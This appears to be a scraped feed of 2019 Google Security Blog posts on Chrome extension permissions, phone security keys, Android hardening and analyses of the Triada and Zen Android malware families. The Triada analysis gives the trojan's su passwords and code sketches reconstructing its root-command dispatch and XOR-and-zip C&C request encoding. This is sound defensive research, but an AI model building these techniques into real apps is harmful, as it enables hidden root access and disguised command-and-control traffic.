Google Security Blog

Improving Security and Privacy for Extensions Users

Google Security Blog - Wed, 06/12/2019 - 1:02pm
No, Chrome isn’t killing ad blockers -- we’re making them safer
Posted by Devlin Cronin, Chrome Extensions Team
The Chrome Extensions ecosystem has seen incredible advancement, adoption, and growth since its launch over ten years ago. Extensions are a great way for users to customize their experience in Chrome and on the web. As this system grows and expands in both reach and power, user safety and protection remains a core focus of the Chromium project.
In October, we announced a number of changes to improve the security, privacy, and performance of Chrome extensions. These changes include increased user options to control extension permissions, changes to the review process and readability requirements, and requiring two-step verification for developers. In addition, we’ve helped curb abuse through restricting inline installation on websites, preventing the use of deceptive installation practices, and limiting the data collected by extensions. We’ve also made changes to the teams themselves — over the last year, we’ve increased the size of the engineering teams that work on extension abuse by over 300% and the number of reviewers by over 400%.
These and other changes have driven down the rate of malicious installations by 89% since early 2018. Today, we block approximately 1,800 malicious uploads a month, preventing them from ever reaching the store. While the Chrome team is proud of these improvements, the review process alone can't catch all abuse. In order to provide better protection to our users, we need to make changes to the platform as well. This is the suite of changes we’re calling Manifest V3.
This effort is motivated by a desire to keep users safe and to give them more visibility and control over the data they’re sharing with extensions. One way we are doing this is by helping users be deliberate in granting access to sensitive data - such as emails, photos, and access to social media accounts. As we make these changes we want to continue to support extensions in empowering users and enhancing their browsing experience.
To help with this balance, we’re reimagining the way a number of powerful APIs work. Instead of a user granting each extension access to all of their sensitive data, we are creating ways for developers to request access to only the data they need to accomplish the same functionality. One example of this is the introduction of the Declarative Net Request API, which is replacing parts of the Web Request API.
At a high level, this change means that an extension does not need access to all a user’s sensitive data in order to block content. With the current Web Request API, users grant permission for Chrome to pass all information about a network request - which can include things like emails, photos, or other private information - to the extension. In contrast, the Declarative Net Request API allows extensions to block content without requiring the user to grant access to any sensitive information. Additionally, because we are able to cut substantial overhead in the browser, the Declarative Net Request API can have significant, system-level performance benefits over Web Request.
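To make the contrast concrete, here is a minimal sketch of what a declarative blocking rule can look like (the domain is a placeholder, and the exact rule schema was still being iterated on at the time of this post). The extension ships the rule; Chrome matches and blocks requests internally, without forwarding any request data to extension code:

{
  "id": 1,
  "priority": 1,
  "action": { "type": "block" },
  "condition": {
    "urlFilter": "||ads.example.com^",
    "resourceTypes": ["script", "image"]
  }
}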


This has been a controversial change, since the Web Request API is used by many popular extensions, including ad blockers. We are not preventing the development of ad blockers or stopping users from blocking ads. Instead, we want to help developers, including those building content blockers, write extensions in a way that protects users’ privacy.
You can read more about the Declarative Net Request API and how it compares to the Web Request API here.
We understand that these changes will require developers to update the way in which their extensions operate. However, we think it is the right choice to enable users to limit the sensitive data they share with third parties while giving them the ability to curate their own browsing experience. We are continuing to iterate on many aspects of the Manifest V3 design, and are working with the developer community to find solutions that both solve the use cases extensions have today and keep our users safe and in control.

Use your Android phone’s built-in security key to verify sign-in on iOS devices

Google Security Blog - Wed, 06/12/2019 - 12:00pm
Posted by Kaiyu Yan and Christiaan Brand
Compromised credentials are one of the most common causes of security breaches. While Google automatically blocks the majority of unauthorized sign-in attempts, adding 2-Step Verification (2SV) considerably improves account security. At Cloud Next ‘19, we introduced a new 2SV method, enabling more than a billion users worldwide to better protect their accounts with a security key built into their Android phones.
This technology can be used to verify your sign-in to Google and Google Cloud services on Bluetooth-enabled Chrome OS, macOS, and Windows 10 devices. Starting today, you can use your Android phone to verify your sign-in on Apple iPads and iPhones as well.
Security keys
FIDO security keys provide the strongest protection against automated bots, bulk phishing, and targeted attacks by leveraging public key cryptography to verify both your identity and the URL of the login page, so that an attacker can’t access your account even if you are tricked into providing your username and password. Learn more by watching our presentation from Cloud Next ‘19.


On Chrome OS, macOS, and Windows 10 devices, we leverage the Chrome browser to communicate with your Android phone’s built-in security key over Bluetooth using FIDO’s CTAP2 protocol. On iOS devices, Google’s Smart Lock app is leveraged in place of the browser.


User experience on an iPad with Pixel 3

Until now, there were limited options for using FIDO2 security keys on iOS devices. Now, you can get the strongest 2SV method with the convenience of an Android phone that’s always in your pocket at no additional cost.
It’s easy to get started
Follow these simple steps to protect your Google Account today:
Step 1: Add the security key to your Google Account
  • Add your personal or work Google Account to your Android 7.0+ (Nougat) phone.
  • Make sure you’re enrolled in 2-Step Verification (2SV).
  • On your computer, visit the 2SV settings and click "Add security key".
  • Choose your Android phone from the list of available devices.
Step 2: Use your Android phone's built-in security key
You can find more detailed instructions here. Within enterprise organizations, admins can require the use of security keys for their users in G Suite and Google Cloud Platform (GCP), letting them choose between using a physical security key, an Android phone, or both.
We also recommend that you register a backup hardware security key (from Google or a number of other vendors) for your account and keep it in a safe place, so that you can gain access to your account if you lose your Android phone.

PHA Family Highlights: Triada

Google Security Blog - Thu, 06/06/2019 - 1:22pm
Posted by Lukasz Siewierski, Android Security & Privacy Team

We continue our PHA family highlights series with the Triada family, which was first discovered early in 2016. The main purpose of Triada apps was to install spam apps on a device, which then displayed ads. The creators of Triada collected revenue from the ads displayed by the spam apps. The methods Triada used were complex and unusual for these types of apps. Triada apps started as rooting trojans, but as Google Play Protect strengthened defenses against rooting exploits, Triada apps were forced to adapt, progressing to a system image backdoor. However, thanks to OEM cooperation and our outreach efforts, OEMs prepared system images with security updates that removed the Triada infection.
History of Triada
Triada was first described in a blog post on the Kaspersky Lab website in March 2016 and in a follow-up blog post in June 2016. Back then, it was a rooting trojan that tried to exploit the device and, after getting elevated privileges, performed a host of different actions. To hide these actions from analysts, Triada used a combination of dynamic code loading and additional app installs. The Kaspersky posts detail the code injection technique used by Triada and provide some statistics on infected devices at the time. In this post, we’ll focus on the peculiar encryption routine and the unusual binary files used by Triada.
Triada’s first action was to install a type of superuser (su) binary file. This su binary allowed other apps on the device to use root permissions. Unlike the regular su binaries common on other Linux systems, the su binary used by Triada required a password.
The binary accepted two passwords, od2gf04pd9 and ac32dorbdq. This is illustrated in the IDA screenshot below. Depending on which one was provided, the binary either 1) ran the command given as an argument as root or 2) concatenated all of the arguments, prepended sh, and ran the result as root. Either way, the app had to know the correct password to run the command as root.
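As a rough model of that dispatch logic (a reconstruction from the behavior described above, not Triada’s actual code; which password selects which mode is an assumption, and run_as_root stands in for the binary’s privileged exec):

import subprocess

def run_as_root(argv):
    # stand-in for the real binary's exec with uid 0
    subprocess.run(argv)

def su_main(argv):
    if not argv:
        return 1
    password, args = argv[0], argv[1:]
    if password == "od2gf04pd9":          # mode 1: run the given command as root
        run_as_root(args)
    elif password == "ac32dorbdq":        # mode 2: concatenate, prepend sh, run as root
        run_as_root(["sh", "-c", " ".join(args)])
    else:
        return 1                          # wrong password: nothing runs as root
    return 0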
This Triada rooting trojan was mainly used to install apps and display ads. This trojan targeted older devices because the rooting exploits didn’t work on newer ones. Therefore, the trojan implemented a weight watching feature to decide if old apps needed to be deleted to make space for new installs.
Weight watching included several steps and attempted to free up space on the device’s user partition and system partition. Using a blacklist and whitelist of apps, it first removed all the apps on its blacklist. If more free space was required, it would remove all other apps, leaving only the apps on the whitelist. This process freed space while ensuring the apps needed for the phone to function properly were not removed.
Every app on the system partition had a number, or weight, associated with it. The weight was a sum of the number of apps installed on the same date as the app in question and the number of apps signed with the same certificate. The apps with the lowest weight were installed in isolation (that is, not on a day that the device system image was created) and weren’t signed by the OEM or weren’t part of a developer bundle. In the weight watching process, these apps were removed first, until enough space was made for the new app.
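A minimal sketch of the weight computation and removal order, reconstructed from the description above (the App fields are illustrative, not Triada’s actual data structures):

from dataclasses import dataclass

@dataclass
class App:
    name: str
    install_date: str   # e.g. "2016-03-01"
    signing_cert: str

def weight(app, system_apps):
    # weight = apps installed on the same date + apps signed with the same certificate
    same_day = sum(1 for a in system_apps if a.install_date == app.install_date)
    same_cert = sum(1 for a in system_apps if a.signing_cert == app.signing_cert)
    return same_day + same_cert

def removal_order(system_apps):
    # lowest weight first: isolated installs not signed by the OEM go before
    # anything that shipped with the system image or a developer bundle
    return sorted(system_apps, key=lambda a: weight(a, system_apps))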
su binary accepts two passwords
In addition to installing apps that display ads, Triada injected code into four web browsers: AOSP (com.android.browser), 360 Secure (com.qihoo.browser), Cheetah (com.ijinshan.browser_fast), and Oupeng (com.oupeng.browser). The code was injected using the same technique described in our blog post about the Zen PHA family and in the previously mentioned Kaspersky blog posts.
The web browser injection was done to overwrite the URLs and substitute ad banners on websites with ads benefiting the Triada authors.
Triada also used a peculiar and complex communication encryption routine. Whenever it had to send a request to the Command and Control (C&C) server, it encrypted the request using two XOR loops with different passwords. Because of XOR rules, if the passwords had the same character in the same position, those characters weren’t encrypted. The encrypted request was saved to a file, which had the same name as its size. Finally, the file was zipped and sent to the C&C server in the POST request body.
The example below illustrates one such request. The yellow bytes are the zip file’s signature of the central directory file header. The red bytes show the uncompressed file size of 0x0952. The blue bytes show the file name length (4) and the name itself (2386, a decimal version of 0x0952).
09 00 00 50 4B 01 02 14 00 14 00 08 00 08 00 4F ...PK..........O
91 F3 48 AE CF 91 D5 B1 04 00 00 52 09 00 00 04 ..H........R....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 32 33 38 36 50 4B 05 06 00 00 00 00 01 00 01 .2386PK.........
00 32 00 00 00 E3 04 00 00 00 00 .2.........
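Putting these pieces together, the request construction can be sketched as follows (Python for illustration; the two passwords are placeholders, not Triada’s actual keys):

import io
import zipfile

def xor_loop(data: bytes, password: bytes) -> bytes:
    return bytes(b ^ password[i % len(password)] for i, b in enumerate(data))

def build_request(plaintext: bytes, pw1: bytes, pw2: bytes) -> bytes:
    # two XOR loops; wherever pw1 and pw2 share a character at the same
    # position, the two XORs cancel and that byte is left unencrypted
    encrypted = xor_loop(xor_loop(plaintext, pw1), pw2)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        # the entry is named after its own uncompressed size ("2386" above)
        archive.writestr(str(len(encrypted)), encrypted)
    return buf.getvalue()  # sent as the body of the POST to the C&C server

body = build_request(b"[collect_Head]device=Nexus 5X", b"password1", b"password2")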
The underlying data protocol changed periodically. It was either simple JSON, a list of key-value pairs similar to a properties file, or a proprietary format, as shown below.
[collect_Head]device=Nexus 5X
[collect_Space]xadevicekey=xxxxx

[collect_Space]collentmod=opappresultmode
[collect_Space]registerUser=true
[collect_End]
When Triada was discovered, we implemented detection that removed Triada samples from all devices with Google Play Protect. This implementation, combined with the increased security on newer Android devices, made it significantly harder for Triada to infect devices.
When rooting doesn’t work…
During the summer of 2017, we noticed a change in new Triada samples. Instead of rooting the device to obtain elevated privileges, Triada evolved to become a pre-installed Android framework backdoor. The changes to Triada included an additional call in the Android framework log function, demonstrated below with a highlighted configuration string.
LABEL_13:
  v18 = -1;
LABEL_18:
  j___config_log_println(v7, v6, v10, v11, "cf89450001");
  if ( v10 )
This backdoored log function version of Triada was first described by Dr.Web in July 2017. The blog post includes a description of Triada code injection methods.
By backdooring the log function, the additional code executes every time the log method is called (that is, every time any app on the phone tries to log something). These log attempts happen many times per second, so the additional code is running non-stop. The additional code also executes in the context of the app logging a message, so Triada can execute code in any app context. The code injection framework in early versions of Triada worked on Android releases prior to Marshmallow.
The main purpose of the backdoor function was to execute code in another app’s context. The backdoor attempts to execute additional code every time the app needs to log something. Triada developers created a new file format, which we called MMD, based on the file header.
The MMD format was an encrypted version of a DEX file, which was then executed in the app context. The encryption algorithm was a double XOR loop with two different passwords. The format is illustrated below.
Each MMD file had a specific file name of the format <MD5 of the process name>36.jmd. By using the MD5 of the process name, the Triada authors tried to obscure the injection target. However, the pool of all available process names is fairly small, so this hash was easily reversible.
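For example, an analyst can recover the target with a brute force over candidate process names, as in this sketch (the candidate list here is illustrative):

import hashlib

# candidate pool: process names are app package names, so the pool is small
CANDIDATES = ["com.android.systemui", "com.android.vending", "com.android.phone"]

def injection_target(mmd_name: str):
    digest = mmd_name[:-len("36.jmd")]  # strip the constant "36.jmd" suffix
    for process in CANDIDATES:
        if hashlib.md5(process.encode()).hexdigest() == digest:
            return process
    return None  # not in the candidate pool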
We identified two code injection targets: com.android.systemui (the System UI app) and com.android.vending (the Google Play app). The first target was injected to get the GET_REAL_TASKS permission. This is a signature-level permission, which means that it can’t be held by ordinary Android apps.
Starting with Android Lollipop, the getRecentTasks() method is deprecated to protect users' privacy. However, apps holding the GET_REAL_TASKS permission can get the result of this method call. To hold the GET_REAL_TASKS permission, an app has to be signed with a specific certificate, the device’s platform cert, which is held by the OEM. Triada didn’t have access to this cert. Instead it executed additional code in the System UI app, which has the GET_REAL_TASKS permission.
The injected code returned the app running on top (the activity running in the foreground and being actively used by the device user) to other apps on the device. This information was exposed using two methods: an intent or a socket created for this purpose. When an app on the device sent the intent or wrote to a socket created by Triada’s code injection, it received the package name of the app running on top. Triada used the package name to determine if an ad was displayed. The assumption was that if the app running on top was a browser, the user would expect to see some ads, so Triada displayed ads from the background.
The second injection target was the Google Play app. This injection supported five commands and responses to them. The supported commands are shown below in Chinese, a language that was used throughout the Triada app and injection, with English translations in parentheses.
  1. 下载请求 (download request)
  2. 下载结果 (download result)
  3. 安装请求 (install request)
  4. 安装结果 (installation result)
  5. 激活请求 (activation request)
  6. 激活结果 (activation result)
  7. 拉活请求 (pull request)
  8. 拉活结果 (pull result)
  9. 卸载请求 (uninstall request)
  10. 卸载结果 (uninstall result)
The commands trigger the heartbeat (pull request), download, installation, uninstallation (in the Google Play app context), and activation (the first execution) of the apps. In the Google Play app context, installation meant that Triada didn’t have to turn on installation from unknown sources and all app installs looked like they were from Google Play.
The apps were downloaded from the C&C server and the communication with the C&C was encrypted using the same custom encryption routine using double XOR and zip. The downloaded and installed apps used the package names of unpopular apps available on Google Play. They didn’t have any relation to the apps on Google Play apart from the same package name.
The last piece of the puzzle was the way the backdoor in the log function communicated with the installed apps. This communication prompted the investigation: the change in Triada behavior mentioned at the beginning of this section made it appear that there was another component on the system image. The apps could communicate with the Triada backdoor by logging a line with a specific predefined tag and message.
The reverse communication was more complicated. The backdoor used Java properties to relay a message to the app. These properties were key-value pairs similar to Android system properties, but they were scoped to a specific process. Setting one of these properties in one app context ensures that other apps won’t see this property. Despite that, some versions of Triada indiscriminately created the properties in every single app process.
The diagram below illustrates the communication mechanisms of the Triada backdoor.
Communication mechanisms of Triada
Reverse engineering countermeasures and development
The Triada backdoor was hidden to make the analysis harder. The strings in the Android framework library that related to Triada activities were encrypted, as shown below.
Android framework strings
The strings were encrypted using the same two-XOR-loop algorithm. However, the first highlighted string, 36.jmd, wasn’t encrypted. This is the MMD file name string mentioned before.
Another anti-analysis measure implemented by the Triada authors was function padding, including additional exported functions that don't serve any purpose apart from making the file size bigger and the function layout more random with every compilation. Four types of these functions are shown in the screenshots below.
Example of function padding
One final interesting feature of Triada worth mentioning is the development cycle. By analyzing subsequent versions of the Triada backdoor (up to 1.5.1), we saw changes in the code. In the newest version, the authors substituted MD5 with SHA1. This hash is used for the file names, which come from a restricted pool of values. The newest version also encrypted the 36.jmd string and introduced changes to the code for compatibility with Android Nougat.
There are also code stubs pointing at the modification of the SystemUI and WebView Android framework elements. We couldn’t find the code that was executed by these modifications, just code stubs suggesting more development in the future.
OEM outreach
Triada infects device system images through a third party during the production process. Sometimes OEMs want to include features that aren’t part of the Android Open Source Project, such as face unlock. The OEM might partner with a third party that can develop the desired feature and send the whole system image to that vendor for development.
Based on analysis, we believe that a vendor using the name Yehuo or Blazefire infected the returned system image with Triada.
Production process with malicious party
We coordinated with the affected OEMs to provide system updates and remove traces of Triada. We also scan for Triada and similar threats on all Android devices.
OEMs should ensure that all third-party code is reviewed and can be tracked to its source. Additionally, any functionality added to the system image should only support requested features. It’s a good practice to perform a security review of a system image after adding third-party code.
Summary
Triada was inconspicuously included in the system image as third-party code for additional features requested by the OEMs. This highlights the need for thorough ongoing security reviews of system images before the device is sold to users as well as any time they get updated over-the-air (OTA).
By working with the OEMs and supplying them with instructions for removing the threat from devices, we reduced the spread of preinstalled Triada variants and removed infections from the devices through the OTA updates.
The Triada case is a good example of how Android malware authors are becoming more adept. This case also shows that it’s becoming harder to infect Android devices, especially if the malware author requires privilege elevation.
We are also performing a security review of system images through the Build Test Suite. You can read more about this program in the Android Security 2018 Year in Review report. Triada indicators of compromise are one of many signatures included in the system image scan. Additionally, Google Play Protect continues to track and remove any known versions of Triada and Triada-related apps it detects from user devices.


Quantifying Measurable Security

Google Security Blog - Mon, 06/03/2019 - 9:48am
Posted by Eugene Liderman, Android Security & Privacy Team
With Google I/O this week you are going to hear about a lot of new features in Android that are coming in Q. One thing that you will also hear about is how every new Android release comes with dozens of security and privacy enhancements. We have been continually investing in our layered security approach, which is also referred to as “defense-in-depth”. These defenses start with hardware-based security, moving up the stack to the Linux kernel with app sandboxing. On top of that, we provide built-in security services designed to protect against malware and phishing.
However layered security doesn’t just apply to the technology. It also applies to the people and the process. Both Android and Chrome OS have dedicated security teams who are tasked with continually enhancing the security of these operating systems through new features and anti-exploitation techniques. In addition, each team leverages a mature and comprehensive security development lifecycle process to ensure that security is always part of the process and not an afterthought.
Secure by design is not the only thing that Android and Chrome OS have in common. Both operating systems also share numerous key security concepts, including:
  • Heavily relying on hardware-based security for things like rollback prevention and verified boot
  • Continued investment in anti-exploitation techniques so that a bug or vulnerability does not become exploitable
  • Implementing two copies of the OS in order to support seamless updates that run in the background and notify the user when the device is ready to boot the new version
  • Splitting up feature and security updates and providing a frequent cadence of security updates
  • Providing built-in anti-malware and anti-phishing solutions through Google Play Protect and Google Safe Browsing
On the Android Security & Privacy team we’re always trying to find ways to assess our ongoing security investments; we often refer to this as measurable security. One way we measure our ongoing investments is through third party analyst research such as Gartner’s May 2019 Mobile OSs and Device Security: A Comparison of Platforms report (subscription required). For those not familiar with this report, it’s a comprehensive comparison between “the core OS security features that are built into various mobile device platforms, as well as enterprise management capabilities.” In the first part, under the category “Built-In Security”, Gartner provides a comparison of the out-of-the-box controls. In the second part, called “Corporate-Managed Security”, Gartner compares the enterprise management controls available for the latest versions of the major mobile device platforms. Here is how our operating systems and devices ranked:
  • Android 9 (Pie) scored “strong” in 26 out of 30 categories
  • Pixel 3 with Titan M received “strong” ratings in 27 of the 30 categories, and had the most “strong” ratings in the built-in security section out of all devices evaluated (15 out of 17)
  • Chrome OS was added in this year's report and received “strong” ratings in 27 of the 30 categories.
Check out the video of Patrick Hevesi, who was the lead analyst on the report, introducing the 2019 report, the methodology and what went into this year's criteria.

You can see a breakdown of all of the categories in the table below:


Take a look at all of the great security and privacy enhancements that came in Pie by reading Android Pie à la mode: Security & Privacy. Also be sure to live stream our Android Q security update at Google I/O, titled “Security on Android: What's Next”, on Thursday at 8:30am Pacific Time.

Queue the Hardening Enhancements

Google Security Blog - Wed, 05/29/2019 - 12:32pm

Posted by Jeff Vander Stoep, Android Security & Privacy Team and Chong Zhang, Android Media Team

[Cross-posted from the Android Developers Blog]

Android Q Beta versions are now publicly available. Among the various new features introduced in Android Q are some important security hardening changes. While exciting new security features are added in each Android release, hardening generally refers to security improvements made to existing components.

When prioritizing platform hardening, we analyze data from a number of sources including our vulnerability rewards program (VRP). Past security issues provide useful insight into which components can use additional hardening. Android publishes monthly security bulletins which include fixes for all the high/critical severity vulnerabilities in the Android Open Source Project (AOSP) reported through our VRP. While fixing vulnerabilities is necessary, we also get a lot of value from the metadata - analysis on the location and class of vulnerabilities. With this insight we can apply the following strategies to our existing components:

  • Contain: isolating and de-privileging components, particularly ones that handle untrusted content. This includes:
    • Access control: adding permission checks, increasing the granularity of permission checks, or switching to safer defaults (for example, default deny).
    • Attack surface reduction: reducing the number of entry/exit points (i.e. principle of least privilege).
    • Architectural decomposition: breaking privileged processes into less privileged components and applying attack surface reduction.
  • Mitigate: Assume vulnerabilities exist and actively defend against classes of vulnerabilities or common exploitation techniques.

Here’s a look at high severity vulnerabilities by component and cause from 2018:

Most of Android’s vulnerabilities occur in the media and Bluetooth components. Use-after-free (UAF), integer overflows, and out-of-bounds (OOB) reads/writes comprise 90% of vulnerabilities, with OOB being the most common.

A Constrained Sandbox for Software Codecs

In Android Q, we moved software codecs out of the main mediacodec service into a constrained sandbox. This is a big step forward in our effort to improve security by isolating various media components into less privileged sandboxes. As Mark Brand of Project Zero points out in his Return To Libstagefright blog post, constrained sandboxes are not where an attacker wants to end up. In 2018, approximately 80% of the critical/high severity vulnerabilities in media components occurred in software codecs, meaning further isolating them is a big improvement. Due to the increased protection provided by the new mediaswcodec sandbox, these same vulnerabilities will receive a lower severity based on Android’s severity guidelines.

The following figure shows an overview of the evolution of media services layout in the recent Android releases.

  • Prior to N, media services are all inside one monolithic mediaserver process, and the extractors run inside the client.
  • In N, we delivered a major security re-architecture, where a number of lower-level media services were spun off into individual service processes with reduced-privilege sandboxes. Extractors were moved to the server side and put into a constrained sandbox. Only a couple of higher-level functionalities remained in mediaserver itself.
  • In O, the services were “treblized” and further deprivileged, that is, separated into individual sandboxes and converted into HALs. The media.codec service became a HAL while still hosting both software and hardware codec implementations.
  • In Q, the software codecs are extracted from the media.codec process and moved back to the system side. They become a system service that exposes the codec HAL interface. SELinux policy and seccomp filters are further tightened for this process. In particular, while the previous mediacodec process had access to device drivers for hardware-accelerated codecs, the software codec process has no access to device drivers.

With this move, we now have the two primary sources for media vulnerabilities tightly sandboxed within constrained processes. Software codecs are similar to extractors in that they both have extensive code parsing bitstreams from untrusted sources. Once a vulnerability is identified in the source code, it can be triggered by sending a crafted media file to media APIs (such as MediaExtractor or MediaCodec). Sandboxing these two services allows us to reduce the severity of potential security vulnerabilities without compromising performance.

In addition to constraining riskier codecs, a lot of work has also gone into preventing common types of vulnerabilities.

Bound Sanitizer

Incorrect or missing memory bounds checking on arrays account for about 34% of Android’s userspace vulnerabilities. In cases where the array size is known at compile time, LLVM’s bound sanitizer (BoundSan) can automatically instrument arrays to prevent overflows and fail safely.

BoundSan instrumentation
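Conceptually, the inserted check looks like this (sketched in Python purely for illustration; the real check is compiler-generated machine code operating on array bounds known at compile time):

def boundsan_load(array, index):
    # the compiler-inserted bounds check: abort instead of reading out of bounds
    if index < 0 or index >= len(array):
        raise SystemExit("BoundSan: out-of-bounds access, aborting safely")
    return array[index]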

BoundSan is enabled in 11 media codecs and throughout the Bluetooth stack for Android Q. By optimizing away a number of unnecessary checks the performance overhead was reduced to less than 1%. BoundSan has already found/prevented potential vulnerabilities in codecs and Bluetooth.

More integer sanitizer in more places

Android pioneered the production use of sanitizers in Android Nougat when we first started rolling out integer sanitization (IntSan) in the media frameworks. This work has continued with each release and has been very successful in preventing otherwise exploitable vulnerabilities. For example, new IntSan coverage in Android Pie mitigated 11 critical vulnerabilities. Enabling IntSan is challenging because overflows are generally benign and unsigned integer overflows are well defined and sometimes intentional. This is quite different from the bound sanitizer, where OOB reads/writes are always unintended and often exploitable. Enabling IntSan has been a multi-year project, but with Q we have fully enabled it across the media frameworks with the inclusion of 11 more codecs.

IntSan Instrumentation

IntSan works by instrumenting arithmetic operations to abort when an overflow occurs. This instrumentation can have an impact on performance, so evaluating the impact on CPU usage is necessary. In cases where performance impact was too high, we identified hot functions and individually disabled IntSan on those functions after manually reviewing them for integer safety.
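In Python terms (illustration only, since Python integers never wrap; the 32-bit limits are made explicit here), the instrumented arithmetic behaves like this:

INT32_MIN, INT32_MAX = -2**31, 2**31 - 1

def intsan_add(a: int, b: int) -> int:
    result = a + b
    if result < INT32_MIN or result > INT32_MAX:
        # an instrumented binary aborts here instead of silently wrapping
        raise SystemExit("IntSan: signed integer overflow")
    return result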

BoundSan and IntSan are considered strong mitigations because (where applied) they prevent the root cause of memory safety vulnerabilities. The class of mitigations described next target common exploitation techniques. These mitigations are considered to be probabilistic because they make exploitation more difficult by limiting how a vulnerability may be used.

Shadow Call Stack

LLVM’s Control Flow Integrity (CFI) was enabled in the media frameworks, Bluetooth, and NFC in Android Pie. CFI makes code reuse attacks more difficult by protecting the forward edges of the call graph, such as function pointers and virtual functions. Android Q uses LLVM’s Shadow Call Stack (SCS) to protect return addresses, protecting the backward edge of the control flow graph. SCS accomplishes this by storing return addresses in a separate shadow stack, which is protected from leakage by storing its location in the x18 register, which is now reserved by the compiler.

SCS Instrumentation
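A toy model of the scheme (Python purely for illustration; in the real instrumentation the shadow stack is a memory region reachable only through x18):

shadow_stack = []

def function_entry(return_address):
    # prologue: save the return address off the ordinary stack
    # (roughly, the compiler emits: str x30, [x18], #8)
    shadow_stack.append(return_address)

def function_return():
    # epilogue: the return address comes from the shadow stack, so an
    # overflow of a stack buffer cannot redirect where the function returns
    # (roughly: ldr x30, [x18, #-8]!)
    return shadow_stack.pop()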

SCS has negligible performance overhead and a small memory increase due to the separate stack. In Android Q, SCS has been turned on in portions of the Bluetooth stack and is also available for the kernel. We’ll share more on that in an upcoming post.

eXecute-Only Memory

Like SCS, eXecute-Only Memory (XOM) aims at making common exploitation techniques more expensive. It does so by strengthening the protections already provided by address space layout randomization (ASLR), which in turn makes code reuse attacks more difficult by requiring attackers to first leak the location of the code they intend to reuse. This often means that an attacker now needs two vulnerabilities, a read primitive and a write primitive, where previously just a write primitive was necessary in order to achieve their goals. XOM protects against leaks (memory disclosures of code segments) by making code unreadable. Attempts to read execute-only code result in the process aborting safely.

Tombstone from a XOM abort

Starting in Android Q, platform-provided AArch64 code segments in binaries and libraries are loaded as execute-only. Not all devices will immediately receive the benefit as this enforcement has hardware dependencies (ARMv8.2+) and kernel dependencies (Linux 4.9+, CONFIG_ARM64_UAO). For apps with a targetSdkVersion lower than Q, Android’s zygote process will relax the protection in order to avoid potential app breakage, but 64 bit system processes (for example, mediaextractor, init, vold, etc.) are protected. XOM protections are applied at compile-time and have no memory or CPU overhead.

Scudo Hardened Allocator

Scudo is a dynamic heap allocator designed to be resilient against heap related vulnerabilities such as:

  • Use-after-frees: by quarantining freed blocks.
  • Double-frees: by tracking chunk states.
  • Buffer overflows: by checksumming headers.
  • Heap sprays and layout manipulation: by improved randomization.

Scudo does not prevent exploitation but rather proactively manages memory in a way to make exploitation more difficult. It is configurable on a per-process basis depending on performance requirements. Scudo is enabled in extractors and codecs in the media frameworks.
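A toy model of two of those defenses, in Python purely for illustration (real Scudo operates on raw memory with compact chunk headers; every name and constant here is invented for the sketch):

class ToyQuarantineHeap:
    def __init__(self, quarantine_slots=4):
        self.slots = quarantine_slots
        self.next_id = 0
        self.live = {}        # chunk id -> (size, header checksum)
        self.quarantine = []  # freed ids held back from immediate reuse

    def _checksum(self, chunk_id, size):
        return (chunk_id * 31 + size) & 0xFFFF  # stand-in for the header checksum

    def malloc(self, size):
        chunk_id, self.next_id = self.next_id, self.next_id + 1
        self.live[chunk_id] = (size, self._checksum(chunk_id, size))
        return chunk_id

    def free(self, chunk_id):
        if chunk_id not in self.live:
            # chunk-state tracking catches double frees and invalid frees
            raise SystemExit("invalid or double free")
        size, stored = self.live.pop(chunk_id)
        if stored != self._checksum(chunk_id, size):
            # a corrupted header suggests a buffer overflow into the chunk
            raise SystemExit("header checksum mismatch")
        # quarantined chunks are not reused right away, so a use-after-free
        # hits stale data instead of an attacker-groomed reallocation
        self.quarantine.append(chunk_id)
        self.quarantine = self.quarantine[-self.slots:]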

Tombstone from Scudo aborts

Contributing security improvements to Open Source

AOSP makes use of a number of Open Source Projects to build and secure Android. Google is actively contributing back to these projects in a number of security-critical areas.

Thank you to Ivan Lozano, Kevin Deus, Kostya Kortchinsky, Kostya Serebryany, and Mike Antares for their contributions to this post.


PHA Family Highlights: Zen and its cousins

Google Security Blog - Tue, 05/21/2019 - 2:03pm
Posted by Lukasz Siewierski, Android Security & Privacy Team
Google Play Protect detects Potentially Harmful Applications (PHAs), which it defines as any mobile app that poses a potential security risk to users or to user data (commonly referred to as "malware"), in a variety of ways, such as static analysis, dynamic analysis, and machine learning. While our systems are great at automatically detecting and protecting against PHAs, we believe the best security comes from the combination of automated scanning and skilled human review.
With this blog series we will be sharing our analysis with the research and broader security community, starting with the PHA family Zen. Zen uses root permissions on a device to automatically enable a service that creates fake Google accounts. These accounts are created by abusing accessibility services. Zen apps gain access to root permissions from a rooting trojan in their infection chain. In this blog post, we do not differentiate between the rooting component and the component that abuses root: we refer to them interchangeably as Zen. We also describe apps that we think come from the same author or group of authors. All of the PHAs that are mentioned in this blog post were detected and removed by Google Play Protect.
Background
Uncovering PHAs takes a lot of detective work, and unraveling the mystery of how they're possibly connected to other apps takes even more. PHA authors usually try to hide their tracks, so attribution is difficult. Sometimes, we can attribute different apps to the same author based on small, unique pieces of evidence that suggest similarity, such as a repetition of an exceptionally rare code snippet, asset, or a particular string in the debug logs. Every once in a while, authors leave behind a trace that allows us to attribute not only similar apps, but also multiple different PHA families to the same group or person.
However, the actual timeline of the creation of different variants is unclear. In April 2013, we saw the first sample, which made heavy use of dynamic code loading (i.e., fetching executable code from remote sources after the initial app is installed). Dynamic code loading makes it impossible to state what kind of PHA it was. This sample displayed ads from various sources. More recent variants blend rooting capabilities and click fraud. As rooting exploits on Android become less prevalent and lucrative, PHA authors adapt their abuse or monetization strategy to focus on tactics like click fraud.
This post doesn't follow the chronological evolution of Zen, but instead covers relevant samples from least to most complex.
Apps with a custom-made advertisement SDK
The simplest PHA from the author's portfolio used a specially crafted advertisement SDK to create a proxy for all ads-related network traffic. By proxying all requests through a custom server, the real source of ads is opaque. This example shows one possible implementation of this technique.
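A minimal sketch of the client side of such an SDK (Python for illustration; the proxy endpoint and field names are invented):

import json
import urllib.request

PROXY = "https://ads.invented-proxy.example/serve"  # hypothetical author-run server

def fetch_ad(slot: str) -> dict:
    # every ad request goes through the author's server, so an observer on
    # the device sees only the proxy, never the real ad network behind it
    with urllib.request.urlopen(f"{PROXY}?slot={slot}") as resp:
        return json.load(resp)  # a third-party ad or the author's own; the proxy decides

def report(ad_id: str, event: str) -> None:
    # click and impression statistics flow back for revenue tracking
    urllib.request.urlopen(f"{PROXY}?stat={event}&ad={ad_id}")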

